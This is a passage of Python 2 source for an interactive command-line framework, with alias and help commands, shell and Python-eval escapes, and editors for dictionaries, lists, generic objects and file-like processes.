\"lLcia\")\n\t\tfor opt, optarg in opts:\n\t\t\tif opt ==\"-i\":\n\t\t\t\tlocal=False ; created=False ; inherited=True\n\t\t\telif opt == \"-c\":\n\t\t\t\tlocal=False ; created=True ; inherited=False\n\t\t\telif opt == \"-l\":\n\t\t\t\tlocal=True ; created=False ; inherited=False\n\t\t\telif opt == \"-a\":\n\t\t\t\tlocal=True ; created=True ; inherited=True\n\t\t\telif opt == \"-L\":\n\t\t\t\tlocal=True ; created=True ; inherited=False\n\t\tif not args:\n\t\t\targs = self.get_commands()\n\t\tfor name in args:\n\t\t\ttry:\n\t\t\t\tdoc = getattr(self, name).__doc__\n\t\t\texcept AttributeError:\n\t\t\t\tself._print(\"No command named %r found.\" % (name,))\n\t\t\t\tcontinue\n\t\t\tif not doc:\n\t\t\t\tself._print(\"No docs for %r.\" % (name,))\n\t\t\telif local and self.__class__.__dict__.has_key(name):\n\t\t\t\tself._ui.help_local(doc)\n\t\t\telif created and \"*\" in doc: # dynamic method from generic_cli\n\t\t\t\tself._ui.help_created(doc)\n\t\t\telif inherited:\n\t\t\t\tself._ui.help_inherited(doc)\n\n\tdef unalias(self, argv):\n\t\t\"\"\"unalias <alias>\n Remove the named alias from the alias list.\"\"\"\n\t\tif len(argv) < 2:\n\t\t\tself._print(self.unalias.__doc__)\n\t\t\treturn\n\t\ttry:\n\t\t\tdel self._aliases[argv[1]]\n\t\texcept:\n\t\t\tself._print(\"unalias: %s: not found\" % argv[1])\n\n\tdef alias(self, argv):\n\t\t\"\"\"alias [newalias]\n With no argument prints the current set of aliases. With an argument of the\n form alias ..., sets a new alias. \"\"\"\n\t\tif len(argv) == 1:\n\t\t\tfor name, val in self._aliases.items():\n\t\t\t\tself._print(\"alias %s='%s'\" % (name, \" \".join(val)))\n\t\t\treturn 0\n\t\telif len(argv) == 2 and '=' not in argv[1]:\n\t\t\tname = argv[1]\n\t\t\ttry:\n\t\t\t\tself._print(\"%s=%s\" % (name, \" \".join(self._aliases[name])))\n\t\t\texcept KeyError:\n\t\t\t\tself._print(\"undefined alias.\")\n\t\t\treturn 0\n\t\t# else\n\t\ttry: # this icky code to handle different permutations of where the '=' is.\n\t\t\targv.pop(0) # discard 'alias'\n\t\t\tname = argv.pop(0)\n\t\t\tif \"=\" in name:\n\t\t\t\tname, rh = name.split(\"=\", 1)\n\t\t\t\targv.insert(0,rh)\n\t\t\telif argv[0].startswith(\"=\"):\n\t\t\t\tif len(argv[0]) > 1: # if argv[1] is '=something'\n\t\t\t\t\targv[0] = argv[0][1:]\n\t\t\t\telse:\n\t\t\t\t\tdel argv[0] # remove the '='\n\t\t\tself._aliases[name] = argv\n\t\texcept:\n\t\t\tex, val = sys.exc_info()[:2]\n\t\t\tself._print(\"alias: Could not set alias. Usage: alias name=value\")\n\t\t\tself._print(\"%s (%s)\" % (ex, val))\n\t\t\treturn 1\n\n\tdef sleep(self, argv):\n\t\t\"\"\"sleep <secs>\n Sleeps for <secs> seconds.\"\"\"\n\t\tsecs = int(argv[1])\n\t\ttimer.sleep(secs)\n\tdelay = sleep # alias\n\n\tdef stty(self, argv):\n\t\t\"\"\"stty <args>\n Sets or clears tty flags. May also use \"clear\", \"reset\", \"sane\". \"\"\"\n\t\tself._print(termtools.stty(self._ui._io.fileno(), *tuple(argv[1:])))\n\n\tdef debug(self, argv):\n\t\t\"\"\"debug [\"on\"|\"off\"]\n\tEnables debugging for CLI code. Enters debugger is an exception occurs.\"\"\"\n\t\tglobal _DEBUG\n\t\tif len(argv) > 1:\n\t\t\tcmd = argv[1]\n\t\t\tif cmd == \"on\":\n\t\t\t\t_DEBUG = True\n\t\t\telse:\n\t\t\t\t_DEBUG = False\n\t\telse:\n\t\t\tself._print(\"Debugging is currently \", IF(_DEBUG, \"on\", \"off\"), \".\")\n\t\t\n\tdef python(self, argv):\n\t\timport code\n\t\tns = self._get_ns()\n\t\tconsole = code.InteractiveConsole(ns)\n\t\tconsole.raw_input = self._ui.user_input\n\t\ttry:\n\t\t\tsaveps1, saveps2 = sys.ps1, sys.ps2\n\t\texcept AttributeError:\n\t\t\tsaveps1, saveps2 = \">>> \", \"... \"\n\t\tsys.ps1, sys.ps2 = \"%%GPython%%N:%s> \" % (self._obj.__class__.__name__,), \"more> \"\n\t\tif readline:\n\t\t\toc = readline.get_completer()\n\t\t\treadline.set_completer(Completer(ns).complete)\n\t\tconsole.interact(\"You are now in Python. ^D exits.\")\n\t\tif readline:\n\t\t\treadline.set_completer(oc)\n\t\tsys.ps1, sys.ps2 = saveps1, saveps2\n\t\tself._reset_scopes()\n\n\tdef _get_ns(self):\n\t\ttry:\n\t\t\tname = self._obj.__class__.__name__.lower()\n\t\texcept:\n\t\t\tname = \"object\"\n\t\treturn {name:self._obj, \"environ\":self._environ}\n\n\nclass BaseCommands(BaseCLI):\n\t\"\"\"Extends the BaseCLI with common commands that enable calling other\n\tprograms, repeating commands, etc.\"\"\"\n\tdef __del__(self):\n\t\tself._stop()\n\n\tdef __call__(self, argv):\n\t\tif argv[0].startswith(\"#\"): # comment\n\t\t\treturn 0\n\t\telif argv[0].startswith(\"!\"): # bang-escape reads pipe\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"pipe\")\n\t\telif argv[0].startswith(\"%\"): # percent-escape spawns pty\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"spawn\")\n\t\telif argv[0].startswith(\"@\"): # python exec escape\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"pyexec\")\n\t\telif argv[0].startswith(\"=\"): # python eval escape\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"pyeval\")\n\t\tsuper(BaseCommands, self).__call__(argv)\n\n\n\t################################\n\t# actual commands follow (no leading '_' and has a docstring.)\n\t#\n\tdef pipe(self, argv):\n\t\t\"\"\"pipe <command>\n Runs a shell command via a pipe, and prints its stdout and stderr. You may\n also prefix the command with \"!\" to run \"pipe\". \"\"\"\n\t\timport proctools\n\t\targv = globargv(argv)\n\t\tproc = proctools.spawnpipe(\" \".join(argv))\n\t\ttext = proc.read()\n\t\tself._print(text)\n\t\tproc.close()\n\t\treturn proc.wait()\n\n\tdef spawn(self, argv):\n\t\t\"\"\"spawn <command>...\n Spawn another process (uses a pty). You may also prefix the command\n with \"%\" to run spawn.\"\"\"\n\t\timport proctools\n\t\targv = globargv(argv)\n\t\tproc = proctools.spawnpty(\" \".join(argv))\n\t\tcmd = self.clone(FileCLI)\n\t\tcmd._setup(proc, \"Process:%s> \" % (proc.cmdline.split()[0],))\n\t\traise NewCommand, cmd\n\n\tdef repeat_command(self, argv):\n\t\t\"\"\"repeat_command <interval> <command> [<args>...]\n Repeats a command every <interval> seconds. If <interval> is zero then\n loop forever (or until interrupted). If <interval> is negative then loop\n with a count of the absolute value of <interval>.\"\"\"\n\t\tif self._repeater:\n\t\t\tself._print(\"Repeat command already defined. Run 'stop' first.\")\n\t\t\treturn\n\t\targv.pop(0) # eat name\n\t\tinterval = int(argv.pop(0))\n\t\targv = self._expand_aliases(argv)\n\t\tmeth = getattr(self, argv[0])\n\t\tif interval > 0:\n\t\t\twr = _RepeatWrapper(self._ui._io, meth, (argv,))\n\t\t\tself._repeater = timer.add(interval, 0, wr, repeat=1)\n\t\telif interval == 0:\n\t\t\ttry:\n\t\t\t\twhile 1:\n\t\t\t\t\tapply(meth, (argv,))\n\t\t\t\t\t# OOO cheat a little. This is need to keep PagedIO\n\t\t\t\t\t# from asking to press a key.\n\t\t\t\t\tself._ui._io.read(0)\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tpass\n\t\telse:\n\t\t\tfor i in xrange(-interval):\n\t\t\t\tapply(meth, (argv,))\n\n\tdef stop_repeater(self, argv):\n\t\t\"\"\"stop_repeater\n Stops a repeating command.\"\"\"\n\t\tself._stop()\n\n\tdef _stop(self):\n\t\tif self._repeater:\n\t\t\ttimer.remove(self._repeater)\n\t\t\tself._repeater = None\n\n\tdef schedule(self, argv):\n\t\t\"\"\"schedule <delay> <command> [<args>...]\n Schedules a command to run <delay> seconds from now.\"\"\"\n\t\targv.pop(0) # eat name\n\t\tdelay = int(argv.pop(0))\n\t\targv = self._expand_aliases(argv)\n\t\tmeth = getattr(self, argv[0])\n\t\ttimer.add(delay, 0, meth, (argv,), repeat=0)\n\n\t# 'hidden' commands (no doc string) follow\n\tdef pyeval(self, argv):\n\t\tsnippet = \" \".join(argv[1:]).strip()+\"\\n\"\n\t\tns = self._get_ns()\n\t\ttry:\n\t\t\tcode = compile(snippet, '<CLI>', 'eval')\n\t\t\trv = eval(code, globals(), ns)\n\t\texcept:\n\t\t\tt, v, tb = sys.exc_info()\n\t\t\tself._print('*** %s (%s)' % (t, v))\n\t\telse:\n\t\t\tself._print(rv)\n\t\t\treturn rv\n\n\tdef pyexec(self, argv):\n\t\tsnippet = \" \".join(argv[1:]).strip()+\"\\n\"\n\t\tns = self._get_ns()\n\t\ttry:\n\t\t\tcode = compile(snippet, '<CLI>', 'exec')\n\t\t\texec code in globals(), ns\n\t\texcept:\n\t\t\tt, v, tb = sys.exc_info()\n\t\t\tself._print('*** %s (%s)' % (t, v))\n\n\n# This is needed to reset PagedIO so background events don't cause the pager to activate.\nclass _RepeatWrapper(object):\n\tdef __init__(self, io, meth, args):\n\t\tself.io = io\n\t\tself.meth = meth\n\t\tself.args = args\n\tdef __call__(self):\n\t\tapply(self.meth, self.args)\n\t\tself.io.read(0) \n\ndef globargv(argv):\n\tif len(argv) > 2:\n\t\timport glob\n\t\tl = []\n\t\tmap(lambda gl: l.extend(gl), map(lambda arg: glob.has_magic(arg) and glob.glob(arg) or [arg], argv[2:]))\n\t\targv = argv[0:2] + l\n\treturn argv[1:]\n\n# TODO: should be able to specify value's object type\ndef breakout_args(argv, namespace=None):\n\t\"\"\"convert a list of string arguments (with possible keyword=arg pairs) to\n\tthe most likely objects.\"\"\"\n\targs = []\n\tkwargs = {}\n\tif namespace:\n\t\tif not isinstance(namespace, dict):\n\t\t\traise ValueError, \"namespace must be dict\"\n\telse:\n\t\tnamespace = locals()\n\tfor argv_arg in argv:\n\t\tif argv_arg.find(\"=\") > 0:\n\t\t\t[kw, kwarg] = argv_arg.split(\"=\")\n\t\t\tkwargs[kw.strip()] = _convert(kwarg, namespace)\n\t\telse:\n\t\t\targs.append(_convert(argv_arg, namespace))\n\treturn tuple(args), kwargs\n\ndef _convert(val, namespace):\n\ttry:\n\t\treturn eval(val, globals(), namespace)\n\texcept:\n\t\treturn val\n\n# public \"safe\" evaluator\ndef clieval(val):\n\ttry:\n\t\treturn eval(val)\n\texcept:\n\t\treturn val # just assume some string otherwise\n\n###### Specialized, but generally useful, command sets follow\n\nclass DictCLI(BaseCommands):\n\t\"\"\"Wrap a dictionary-like object and edit it.\"\"\"\n\tdef _setup(self, obj, prompt=\"\"):\n\t\tself._obj = obj # the dictionary object\n\t\tself._environ[\"PS1\"] = \"%s(dict)> \" % (prompt,)\n\t\tself._reset_scopes()\n\n\tdef _reset_scopes(self):\n\t\tnames = map(str, self._obj.keys())\n\t\tself.add_completion_scope(\"get\", names)\n\t\tself.add_completion_scope(\"set\", names)\n\t\tself.add_completion_scope(\"pop\", names)\n\t\tself.add_completion_scope(\"delete\", names)\n\t\n\tdef set(self, argv):\n\t\t\"\"\"set [-t <type>] <name> <value>\n Set the mapping key to value. Specify a type of the value with the -t\n option. If not provided the value is simply evaluated.\"\"\"\n\t\tt = clieval\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tname = args[0]\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\tt = eval(optarg, globals(), globals())\n\t\t\t\tif type(t) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\tvalue = t(*tuple(args[1:]))\n\t\tself._obj[name] = value\n\t\tself._reset_scopes()\n\n\tdef get(self, argv):\n\t\t\"\"\"get <key>\n Gets and prints the named value.\"\"\"\n\t\tname = argv[1]\n\t\tv = self._obj.get(name)\n\t\tself._print(repr(v))\n\t\treturn v\n\n\tdef delete(self, argv):\n\t\t\"\"\"delete <key>\n Deletes the given key from the mapping.\"\"\"\n\t\tkey = argv[1]\n\t\tdel self._obj[key]\n\t\tself._reset_scopes()\n\n\tdef clear(self, argv):\n\t\t\"\"\"clear\n Clears the mapping.\"\"\"\n\t\tself._obj.clear()\n\t\tself._reset_scopes()\n\t\n\tdef has_key(self, argv):\n\t\t\"\"\"has_key <key>\n Report whether or not the mapping has the given key.\"\"\"\n\t\tif self._obj.has_key(argv[1]):\n\t\t\tself._print(\"Mapping does contain the key %r.\" % (argv[1],))\n\t\telse:\n\t\t\tself._print(\"Mapping does NOT contain the key %r.\" % (argv[1],))\n\n\tdef keys(self, argv):\n\t\t\"\"\"keys\n Show all mapping keys.\"\"\"\n\t\tself._print_list(map(repr, self._obj.keys()))\n\n\tdef values(self, argv):\n\t\t\"\"\"values\n Show all mapping values.\"\"\"\n\t\tself._print_list(self._obj.values())\n\n\tdef items(self, argv):\n\t\t\"\"\"items\n Show mapping items.\"\"\"\n\t\tfor name, val in self._obj.items():\n\t\t\tself._print(\"%25.25r: %r\" % (name, val))\n\t\t\n\tdef pop(self, argv):\n\t\t\"\"\"pop <key>\n\tPops the given key from the mapping.\"\"\"\n\t\tname = argv[1]\n\t\tobj = self._obj.pop(name)\n\t\tself._print(\"Popped: \", repr(obj))\n\t\tself._reset_scopes()\n\t\treturn obj\n\t\n\tdef length(self, argv):\n\t\t\"\"\"length\n\tDisplay the length of this mapping object.\"\"\"\n\t\tself._print(len(self._obj))\n\n# edit list objects\nclass ListCLI(BaseCommands):\n\t\"\"\"Wrap a list object and edit it.\"\"\"\n\tdef _setup(self, obj, prompt=\"\"):\n\t\tself._obj = obj # the list object\n\t\tself._environ[\"PS1\"] = \"%s(list)> \" % (prompt,)\n\t\tself._reset_scopes()\n\n\tdef _get_object(self, name):\n\t\treturn eval(name, globals(), self._environ)\n\n\tdef show(self, argv):\n\t\t\"\"\"show [<index>]\n\tShow the list, or a particular index.\"\"\"\n\t\tif len(argv) > 1:\n\t\t\tfor s_idx in argv[1:]:\n\t\t\t\tindex = int(s_idx)\n\t\t\t\tself._print(\"%3d: %r\" % (index, self._obj[index]))\n\t\telse:\n\t\t\tfor index, obj in enumerate(self._obj):\n\t\t\t\tself._print(\"%3d: %r\" % (index, obj))\n\n\tdef delete(self, argv):\n\t\t\"\"\"delete <index>\n\tDelete the entry at <index>.\"\"\"\n\t\tindex = int(argv[1])\n\t\tdel self._obj[index]\n\t\n\tdef append(self, argv):\n\t\t\"\"\"append [-t <type>] <obj>\n\tAppends the <obj> to the list. Beware that <obj> may not evaluate as you\n\texpect, but simple objects should work.\"\"\"\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tname = args[0]\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\tt = eval(optarg, globals(), globals())\n\t\t\t\tif type(t) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\t\t\tself._obj.append(t(name))\n\t\t\t\treturn\n\t\telse:\n\t\t\tobj = self._get_object(name)\n\t\t\tself._obj.append(obj)\n\n\tdef extend(self, argv):\n\t\t\"\"\"extend [-t type] <object>...\n\tExtends the list with the argument list of converted objects.\"\"\"\n\t\targtype = self._get_object\n\t\tnew = []\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\targtype = eval(optarg, globals(), globals())\n\t\t\t\tif type(argtype) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\tfor name in args:\n\t\t\tnew.append(argtype(name))\n\t\tself._obj.extend(new)\n\n\tdef count(self, argv):\n\t\t\"\"\"count <object>\n\tCounts number of <object> in list.\"\"\"\n\t\tobj = self._get_object(argv[1])\n\t\tcount = self._obj.count(obj)\n\t\tself._print(count)\n\t\treturn count\n\t\n\tdef index(self, argv):\n\t\t\"\"\"index <object>\n\tReturns the index number of <object> in the list.\"\"\"\n\t\tobj = self._get_object(argv[1])\n\t\ti = self._obj.index(obj)\n\t\tself._print(i)\n\t\treturn i\n\t\n\tdef insert(self, argv):\n\t\t\"\"\"insert <index> <object>\n\tInserts the <object> at <index>.\"\"\"\n\t\targtype = self._get_object\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\targtype = eval(optarg, globals(), globals())\n\t\t\t\tif type(argtype) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\tindex = int(args[0])\n\t\tobj = argtype(args[1])\n\t\tself._obj.insert(index, obj)\n\t\n\tdef pop(self, argv):\n\t\t\"\"\"pop [<index>]\n\tPops the <index>'th item from the list. If <index> not given then pop the last item.\"\"\"\n\t\tif len(argv) > 1:\n\t\t\ti = int(argv[1])\n\t\t\tobj = self._obj.pop(i)\n\t\telse:\n\t\t\tobj = self._obj.pop()\n\t\tself._print(\"Popped: %r\" % (obj,))\n\t\treturn obj\n\t\n\tdef remove(self, argv):\n\t\t\"\"\"remove <object>\n\tRemove the <object> from the list.\"\"\"\n\t\tobj = self._get_object(argv[1])\n\t\treturn self._obj.remove(obj)\n\t\n\tdef reverse(self, argv):\n\t\t\"\"\"reverse\n\tReverses the order of the list.\"\"\"\n\t\tself._obj.reverse()\n\t\n\tdef sort(self, argv):\n\t\t\"\"\"sort\n\tSorts, in place, the list.\"\"\"\n\t\tself._obj.sort()\n\n\n### objects for creating quick and dirty (generic) CLI objects that let\n#you interact with another object's methods.\nclass GenericCLI(BaseCommands):\n\t\"\"\"GenericCLI() Generic Object editor commands.\nWraps any object and allows inspecting and altering it. Use the\nget_generic_cli() factory function to get one of these with extra\nmethods/commands that correspond to the wrapped objects methods. \"\"\"\n\n\tdef _generic_call(self, argv):\n\t\tmeth = getattr(self._obj, argv[0])\n\t\targs, kwargs = breakout_args(argv[1:], vars(self._obj))\n\t\trv = apply(meth, args, kwargs)\n\t\tself._print(rv)\n\t\n\tdef _reset_scopes(self):\n\t\tnames = filter(lambda n: not n.startswith(\"__\"), dir(self._obj))\n\t\tself.add_completion_scope(\"show\", names)\n\t\tself.add_completion_scope(\"call\", [n for n in names if callable(getattr(self._obj, n))])\n\t\tself.add_completion_scope(\"set\", names)\n\t\tself.add_completion_scope(\"get\", names)\n\t\tself.add_completion_scope(\"delete\", names)\n\n\tdef subshell(self, io, env=None, aliases=None, theme=None):\n\t\tcliclass = self.__class__\n\t\tnewui = UserInterface(io, env or self._environ.copy(), theme)\n\t\taliases = aliases or self._aliases\n\t\tcmd = cliclass(newui, aliases)\n\t\tcmd._obj = self._obj\n\t\treturn cmd\n\n\tdef call(self, argv):\n\t\t\"\"\"call <name> <arg1>...\n\tCalls the named method with the following arguments converted to \"likely types\".\"\"\"\n\t\tself._generic_call(argv[1:])\n\n\tdef show(self, argv):\n\t\t\"\"\"show [<name>]\n Shows a named attribute of the object, or the object itself if no argument given.\"\"\"\n\t\tif len(argv) > 1:\n\t\t\tv = getattr(self._obj, argv[1])\n\t\t\tself._print(v)\n\t\t\treturn v\n\t\telse:\n\t\t\tself._print(self._obj)\n\n\tdef ls(self, argv):\n\t\t\"\"\"ls\n Display a list of the wrapped objects attributes and their types.\"\"\"\n\t\td = dir(self._obj)\n\t\ts = []\n\t\tms = []\n\t\tfor name in d:\n\t\t\tif name.startswith(\"__\") or name.startswith(\"_p_\"): # hide class-private and persistence overhead objects.\n\t\t\t\tcontinue\n\t\t\tattr = getattr(self._obj, name)\n\t\t\tif type(attr) is MethodType:\n\t\t\t\tms.append(\"%22.22s : %s\" % (name, method_repr(attr)))\n\t\t\telse:\n\t\t\t\ts.append(\"%22.22s : %r\" % (name, attr))\n\t\tself._print(\"Methods:\")\n\t\tself._print(\"\\n\".join(ms))\n\t\tself._print(\"Attributes:\")\n\t\tself._print(\"\\n\".join(s))\n\t\treturn d\n\tdir = ls # alias\n\n\tdef set(self, argv):\n\t\t\"\"\"set [-t <type>] <name> <value>\n Sets the named attribute to a new value. The value will be converted into a\n likely suspect, but you can specify a type with the -t flag. \"\"\"\n\t\tt = clieval\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tname = args[0]\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\tt = eval(optarg, globals(), vars(self._obj))\n\t\t\t\tassert type(t) is type, \"Argument to -t is not a type\"\n\t\tvalue = t(*tuple(args[1:]))\n\t\tsetattr(self._obj, name, value)\n\t\tself._reset_scopes()\n\n\tdef get(self, argv):\n\t\t\"\"\"get <name>\n Gets and prints the named attribute.\"\"\"\n\t\tname = argv[1]\n\t\tv = getattr(self._obj, name)\n\t\tself._print(v)\n\t\treturn v\n\n\tdef delete(self, argv):\n\t\t\"\"\"delete <name>\n Delete the named attribute.\"\"\"\n\t\tname = argv[1]\n\t\tdelattr(self._obj, name)\n\t\tself._reset_scopes()\n\n\n# used to interact with file-like objects.\nclass FileCLI(GenericCLI):\n\t\"\"\"Commands for file-like objects.\"\"\"\n\tdef read(self, argv):\n\t\t\"\"\"read [amt]\n Read <amt> bytes of data.\"\"\"\n\t\targs, kwargs = breakout_args(argv[1:], vars(self._obj))\n\t\tdata = self._obj.read(*args)\n\t\tself._print(data)\n\t\treturn data\n\n\tdef write(self, argv):\n\t\t\"\"\"write <data>\n Writes the arguments to the file.\"\"\"\n\t\twrit = self._obj.write(\" \".join(argv[1:]))\n\t\twrit += self._obj.write(\"\\r\")\n\t\tself._print(\"wrote %d bytes.\" % (writ,))\n\t\treturn writ\n\t\n\tdef interact(self, argv):\n\t\t\"\"\"interact\n Read and write to the file object. Works best with Process objects.\"\"\"\n\t\tio = self._ui._io\n\t\timport select\n\t\tfrom errno import EINTR\n\t\tescape = chr(29) # ^]\n\t\tself._print(\"\\nEntering interactive mode.\")\n\t\tself._print(\"Type ^%s to stop interacting.\" % (chr(ord(escape) | 0x40)))\n\t\t# save tty state and set to raw mode\n\t\tstdin_fd = io.fileno()\n\t\tfo_fd = self._obj.fileno()\n\t\tttystate = termtools.tcgetattr(stdin_fd)\n\t\ttermtools.setraw(stdin_fd)\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\trfd, wfd, xfd = select.select([fo_fd, stdin_fd], [], [])\n\t\t\texcept select.error, errno:\n\t\t\t\tif errno[0] == EINTR:\n\t\t\t\t\tcontinue\n\t\t\tif fo_fd in rfd:\n\t\t\t\ttry:\n\t\t\t\t\ttext = self._obj.read(1)\n\t\t\t\texcept (OSError, EOFError), err:\n\t\t\t\t\ttermtools.tcsetattr(stdin_fd, termtools.TCSAFLUSH, ttystate)\n\t\t\t\t\tself._print( '*** EOF ***' )\n\t\t\t\t\tself._print( err)\n\t\t\t\t\tbreak\n\t\t\t\tif text:\n\t\t\t\t\tio.write(text)\n\t\t\t\t\tio.flush()\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\tif stdin_fd in rfd:\n\t\t\t\tchar = io.read(1)\n\t\t\t\tif char == escape: \n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself._obj.write(char)\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttermtools.tcsetattr(stdin_fd, termtools.TCSAFLUSH, ttystate)\n\t\t\t\t\t\textype, exvalue, tb = sys.exc_info()\n\t\t\t\t\t\tio.errlog(\"%s: %s\\n\" % (extype, exvalue))\n\t\t\t\t\t\ttermtools.setraw(stdin_fd)\n\t\ttermtools.tcsetattr(stdin_fd, termtools.TCSAFLUSH, ttystate)\n\n# The object's public interface is defined to be the methods that don't\n# have a leading underscore, and do have a docstring.\ndef _get_methodnames(obj):\n\tcls = obj.__class__\n\tfor name in dir(cls):\n\t\tif name[0] == \"_\":\n\t\t\tcontinue\n\t\tcls_obj = getattr(cls, name)\n\t\tif type(cls_obj) is MethodType and cls_obj.__doc__:\n\t\t\tyield name, cls_obj\n\n\n# a completer object for readline and python method. Safer than the stock one (no eval).\nclass Completer(object):\n\tdef __init__(self, namespace):\n\t\tassert type(namespace) is dict, \"namespace must be a dict type\"\n\t\tself.namespace = namespace\n\t\tself.globalNamespace = Completer.get_globals()\n\t\tself.globalNamespace.extend(map(str, namespace.keys()))\n\t\tself.matches = []\n\n\tdef complete(self, text, state):\n\t\tif state == 0:\n\t\t\tself.matches = []\n\t\t\tif \".\" in text:\n\t\t\t\tfor name, obj in self.namespace.items():\n\t\t\t\t\tfor key in dir(obj):\n\t\t\t\t\t\tif key.startswith(\"__\"):\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tlname = \"%s.%s\" % (name, key)\n\t\t\t\t\t\tif lname.startswith(text):\n\t\t\t\t\t\t\tself.matches.append(lname)\n\t\t\telse:\n\t\t\t\tfor key in self.globalNamespace:\n\t\t\t\t\tif key.startswith(text):\n\t\t\t\t\t\tself.matches.append(key)\n\t\ttry:\n\t\t\treturn self.matches[state]\n\t\texcept IndexError:\n\t\t\treturn None\n\n\tdef get_globals():\n\t\timport keyword, __builtin__\n\t\trv = keyword.kwlist + dir(__builtin__)\n\t\trv = removedups(rv)\n\t\treturn rv\n\tget_globals = staticmethod(get_globals)\n\n\tdef get_class_members(klass, rv=None):\n\t\tif rv is None:\n\t\t\trv = dir(klass)\n\t\telse:\n\t\t\trv.extend(dir(klass))\n\t\tif hasattr(klass, '__bases__'):\n\t\t\tfor base in klass.__bases__:\n\t\t\t\tCompleter.get_class_members(base, rv)\n\t\treturn rv\n\tget_class_members = staticmethod(get_class_members)\n\ndef get_generic_cmd(obj, ui, cliclass=GenericCLI, aliases=None, gbl=None):\n\t\"\"\"get a GenericCLI (or other) command set wrapping any class instance\n\tobject. The wrapped objects public methods have CLI command counterparts\n\tautomatically created.\"\"\"\n\timport new\n\tfrom basicconfig import MethodHolder\n\tcmd = cliclass(ui, aliases)\n\tif gbl is None:\n\t\tgbl = globals()\n\thashfilter = {}\n\tfor name, obj_meth in _get_methodnames(obj):\n\t\tif hasattr(cmd, name):\n\t\t\tcontinue # don't override already defined methods\n\t\t# all this mess does is introspect the object methods and map it to a CLI\n\t\t# object method of the same name, with a docstring showing the attributes\n\t\t# and their default values, and the actual code mirroring the\n\t\t# _generic_call method in the GenericCLI class.\n\t\telse:\n\t\t\tif id(obj_meth.im_func) in hashfilter: # filter out aliases\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\thashfilter[id(obj_meth.im_func)] = True\n\t\t\tmh = MethodHolder(obj_meth)\n\t\t\tdoc = \"%s *\\n%s\" % (mh, obj_meth.__doc__ or \"\")\n\t\t\tcode = cliclass._generic_call.func_code\n\t\t\tnc = new.code(code.co_argcount, code.co_nlocals, code.co_stacksize, \n\t\t\t\tcode.co_flags, code.co_code, \n\t\t\t\t(doc,)+code.co_consts[1:], # replace docstring\n\t\t\t\tcode.co_names, code.co_varnames, code.co_filename, \n\t\t\t\tcode.co_name, code.co_firstlineno, code.co_lnotab)\n\t\t\tf = new.function(nc, gbl, name)\n\t\t\tm = new.instancemethod(f, cmd, cliclass)\n\t\t\tsetattr(cmd, name, m)\n\tcmd._setup(obj, \"%s:%s\" % (cliclass.__name__, obj.__class__.__name__))\n\treturn cmd\n\ndef get_generic_clone(obj, cli, cliclass=GenericCLI, theme=None):\n\t\"Return a generic clone of an existing Command object.\"\n\tnewui = cli._ui.clone(theme)\n\treturn get_generic_cmd(obj, newui, cliclass, aliases=cli._aliases)\n\ndef get_generic_cli(obj, cliclass=GenericCLI, env=None, aliases=None, theme=None, logfile=None, historyfile=None):\n\t\"\"\" get_generic_cli(obj, cliclass=GenericCLI, env=None, aliases=None)\nReturns a generic CLI object with command methods mirroring the public\nmethods in the supplied object. Ready to interact() with! \"\"\"\n\tio = ConsoleIO()\n\tui = UserInterface(io, env, theme)\n\tcmd = get_generic_cmd(obj, ui, cliclass, aliases)\n\tcmd._export(\"PS1\", \"%s> \" % (obj.__class__.__name__,))\n\tcli = CommandParser(cmd, logfile, historyfile)\n\treturn cli\n\n# this class is indended to be wrapped by GenericCLI as a general Python CLI.\n# It does nothing but allow GenericCLI to pass through its basic functionality.\nclass Shell(object):\n\t\"\"\"A simple class for testing object wrappers.\"\"\"\n\tdef __init__(self, *iargs, **ikwargs):\n\t\tself.initargs = iargs\n\t\tself.initkwargs = ikwargs\n\n\tdef callme(self, *args, **kwargs):\n\t\tPrint(\"args:\", args)\n\t\tPrint(\"kwargs:\", kwargs)\n\n\n# wraps stdio to look like a single read-write object. Also provides additional io methods.\n# The termtools.PagedIO object should have all the same methods as this class.\nclass ConsoleIO(object):\n\tdef __init__(self):\n\t\tself.stdin = sys.stdin\n\t\tself.stdout = sys.stdout\n\t\tself.stderr = sys.stderr\n\t\tself.mode = \"rw\"\n\t\tself.closed = 0\n\t\tself.softspace = 0\n\t\t# reading methods\n\t\tself.read = self.stdin.read\n\t\tself.readline = self.stdin.readline\n\t\tself.readlines = self.stdin.readlines\n\t\tself.xreadlines = self.stdin.xreadlines\n\t\t# writing methods\n\t\tself.write = self.stdout.write\n\t\tself.flush = self.stdout.flush\n\t\tself.writelines = self.stdout.writelines\n\t\n\tdef raw_input(self, prompt=\"\"):\n\t\treturn raw_input(prompt)\n\n\tdef close(self):\n\t\tself.stdout = None\n\t\tself.stdin = None\n\t\tself.closed = 1\n\t\tdel self.read, self.readlines, self.xreadlines, self.write\n\t\tdel self.flush, self.writelines\n\n\tdef fileno(self): # ??? punt, since mostly used by readers\n\t\treturn self.stdin.fileno()\n\n\tdef 